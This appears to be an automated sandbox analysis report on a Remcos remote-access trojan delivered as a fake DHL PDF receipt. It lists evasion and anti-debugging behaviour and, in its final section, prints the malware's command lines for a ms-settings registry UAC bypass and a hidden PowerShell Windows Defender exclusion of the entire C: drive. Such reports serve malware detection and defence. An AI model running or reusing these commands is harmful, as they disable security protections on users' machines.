Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BCD74 0_2_028BCD74
Delayed program exit found
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4F7A7 Sleep,ExitProcess, 0_2_2DA4F7A7
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AF7A7 Sleep,ExitProcess, 5_2_2D5AF7A7
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Powershell is started from unusual location (likely to bypass HIPS)
Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
Uses ping.exe to sleep
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\Public\xkn.exe Memory allocated: 151BB7A0000 memory reserve | memory write watch
Source: C:\Users\Public\xkn.exe Memory allocated: 151BB7A0000 memory reserve | memory write watch
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5A748
Source: C:\ProgramData\Remcos\remcos.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 5_2_2D5BA748
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\Libraries\yfkwifxL.pif Window / User API: threadDelayed 387 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 3512 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 6349 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: foregroundWindowGot 1739 Jump to behavior
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1934
Found large amount of non-executed APIs
Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe API coverage: 8.1 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BCD74 0_2_028BCD74
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\Public\Libraries\yfkwifxL.pif TID: 7480 Thread sleep count: 387 > 30 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -1756000s >= -30000s Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -3174500s >= -30000s Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7952 Thread sleep count: 1934 > 30
Source: C:\Users\Public\xkn.exe TID: 7956 Thread sleep count: 149 > 30
Source: C:\Users\Public\xkn.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_028A58B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2DA4BD37
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW, 0_2_2DA4783C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_2DA4880C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_2DA59AF5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49665
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2DA4C34D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2DA5C291
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49253
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_45BC10F1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 5_2_2D5AC34D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 5_2_2D5ABD37
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 5_2_2D5A9665
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose, 5_2_2D5A880C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW, 5_2_2D5A783C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 5_2_2D5ABB30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B9AF5 FindFirstFileW, 5_2_2D5B9AF5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 5_2_2D5BC291
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 7_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 7_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 7_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 7_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF7689D7B4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 11_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 11_2_00007FF7689C823C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 11_2_00007FF7689B35B8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00007FF7689B1560
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FF7689D7B4C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_2DA47C97
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00418981 memset,GetSystemInfo, 20_2_00418981
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\ Jump to behavior
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: remcos.exe, 00000005.00000003.2495195911.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh[b%SystemRoot%\system32\mswsock.dllss~W
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8|z%SystemRoot%\system32\mswsock.dll
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000075D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: bhvC179.tmp.20.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000625000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWzf
Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvC179.tmp.20.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe API call chain: ExitProcess graph end node
Source: C:\ProgramData\Remcos\remcos.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\xkn.exe Process information queried: ProcessInformation

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_028BD920
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugFlags Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugFlags Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugFlags
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort
Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugFlags
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2DA749F9
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle, 19_2_00007FF6DF31A29C
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA832B5 mov eax, dword ptr fs:[00000030h] 0_2_2DA832B5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028FF3AD mov eax, dword ptr fs:[00000030h] 0_2_028FF3AD
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC4AB4 mov eax, dword ptr fs:[00000030h] 5_2_45BC4AB4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5E32B5 mov eax, dword ptr fs:[00000030h] 5_2_2D5E32B5
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA51CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 0_2_2DA51CFE
Enables debug privileges
Source: C:\Users\Public\xkn.exe Process token adjusted: Debug
Source: C:\ProgramData\Remcos\remcos.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_2DA74FDC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2DA749F9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_2DA7BB22
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74B47 SetUnhandledExceptionFilter, 0_2_2DA74B47
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 1_2_004098D0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004098F0 SetUnhandledExceptionFilter, 1_2_004098F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_45BC60E2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_45BC2B1C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_45BC2639
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_2D5D4FDC
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5D49F9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5D49F8
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D4B47 SetUnhandledExceptionFilter, 5_2_2D5D4B47
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_2D5DBB22
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 7_2_00007FF7689C93B0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 8_2_00007FF7689C93B0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00007FF7689C8FA4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C93B0 SetUnhandledExceptionFilter, 11_2_00007FF7689C93B0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FF6DF31ED50
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF31F050 SetUnhandledExceptionFilter, 19_2_00007FF6DF31F050
Source: C:\Users\Public\xkn.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
